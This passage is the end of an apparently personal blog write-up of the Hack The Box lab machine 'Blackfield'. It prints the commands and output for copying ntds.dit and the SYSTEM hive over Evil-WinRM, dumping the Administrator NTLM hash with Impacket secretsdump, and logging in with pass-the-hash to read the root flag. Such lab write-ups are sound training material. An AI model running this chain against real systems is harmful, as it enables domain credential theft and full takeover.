*Evil-WinRM* PS C:\temp> download system
|
1
|
*Evil-WinRM* PS C:\temp> download ntds.dit
|
Dumping NTLM from ntds.dit and system
Now i have both the files …. i can use secretdump.py
to dump the ntlm hash from them
1
2
3
4
5
6
7
8
9
|
➜ blackfield python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
|
And here we got the NTLM
hash for the user administrator
Login as administrator
1
2
3
4
5
6
7
8
|
➜ blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
|
Got root.txt
1
2
3
|
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
6d1--------------------------f67
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
|
And we pwned it …….
If u liked the writeup.Support a Poor Student to Get the OSCP-Cert
Donation for OSCP
If you want to get notified as soon as i upload something new to my blog
So just click on the bell icon you are seeing on the right side – > and allow push notification
Resources